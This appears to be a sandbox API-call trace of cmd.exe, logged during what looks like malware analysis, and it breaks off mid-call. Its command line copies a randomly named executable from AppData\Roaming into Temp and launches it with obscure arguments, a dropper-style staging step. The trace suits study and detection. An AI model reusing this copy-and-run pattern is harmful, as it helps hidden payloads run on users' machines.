lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegCloseKey (hKey=0x40) returned 0x0 [0107.042] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886354 [0107.042] srand (_Seed=0x5b886354) [0107.042] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0107.042] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0107.042] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.043] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361b00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0107.043] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0107.043] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.043] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.043] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0107.043] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0107.043] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0107.043] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0107.043] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0107.043] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0107.043] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0107.043] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0107.043] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0107.043] GetEnvironmentStringsW () returned 0x3624f0* [0107.043] FreeEnvironmentStringsW (penv=0x3624f0) returned 1 [0107.043] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.043] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.043] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0107.043] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0107.043] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0107.043] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0107.043] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0107.043] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0107.044] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0107.044] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0107.044] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.044] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f878, lpFilePart=0x26f874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f874*="Desktop") returned 0x18 [0107.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.044] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x360b80 [0107.044] FindClose (in: hFindFile=0x360b80 | out: hFindFile=0x360b80) returned 1 [0107.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x360b80 [0107.044] FindClose (in: hFindFile=0x360b80 | out: hFindFile=0x360b80) returned 1 [0107.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x360b80 [0107.044] FindClose (in: hFindFile=0x360b80 | out: hFindFile=0x360b80) returned 1 [0107.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.044] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0107.044] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0107.044] GetEnvironmentStringsW () returned 0x3603a0* [0107.045] FreeEnvironmentStringsW (penv=0x3603a0) returned 1 [0107.045] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.045] GetConsoleOutputCP () returned 0x1b5 [0107.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.045] GetUserDefaultLCID () returned 0x409 [0107.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa44950, cchData=8 | out: lpLCData=":") returned 2 [0107.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="1") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa44940, cchData=8 | out: lpLCData="/") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa44d80, cchData=32 | out: lpLCData="Mon") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa44d40, cchData=32 | out: lpLCData="Tue") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa44d00, cchData=32 | out: lpLCData="Wed") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa44cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa44c80, cchData=32 | out: lpLCData="Fri") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa44c40, cchData=32 | out: lpLCData="Sat") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa44c00, cchData=32 | out: lpLCData="Sun") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa44930, cchData=8 | out: lpLCData=".") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa44920, cchData=8 | out: lpLCData=",") returned 2 [0107.046] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0107.047] GetConsoleTitleW (in: lpConsoleTitle=0x350a20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.047] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.047] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0107.047] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0107.047] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0107.048] _wcsicmp (_String1="type", _String2=")") returned 75 [0107.048] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0107.048] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0107.048] _wcsicmp (_String1="IF", _String2="type") returned -11 [0107.048] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0107.048] _wcsicmp (_String1="REM", _String2="type") returned -2 [0107.048] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0107.051] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 68 [0107.051] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 68 [0107.051] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 71 [0107.051] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 71 [0107.051] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 80 [0107.051] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"") returned 80 [0107.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.054] GetFileType (hFile=0x7) returned 0x2 [0107.071] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f84c | out: lpMode=0x26f84c) returned 1 [0107.072] _dup (_FileHandle=1) returned 3 [0107.073] _close (_FileHandle=1) returned 0 [0107.073] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", _String2="con") returned -53 [0107.073] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f81c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0107.073] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0107.073] GetConsoleTitleW (in: lpConsoleTitle=0x26f64c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.074] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0107.074] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0107.074] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0107.074] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0107.074] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.074] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1b0) returned 0x350f78 [0107.075] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0107.075] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0107.075] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0107.075] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e0bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0107.075] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] GetFileType (hFile=0x54) returned 0x1 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e114 | out: lpFileSizeHigh=0x26e114*=0x0) returned 0x7d600 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.075] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.076] GetFileType (hFile=0x4c) returned 0x1 [0107.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.076] GetFileType (hFile=0x4c) returned 0x1 [0107.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.076] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] GetFileType (hFile=0x4c) returned 0x1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] GetFileType (hFile=0x4c) returned 0x1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.077] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.078] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.078] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.078] GetFileType (hFile=0x4c) returned 0x1 [0107.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.079] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] GetFileType (hFile=0x4c) returned 0x1 [0107.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.079] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.080] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.080] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] GetFileType (hFile=0x4c) returned 0x1 [0107.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.080] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, 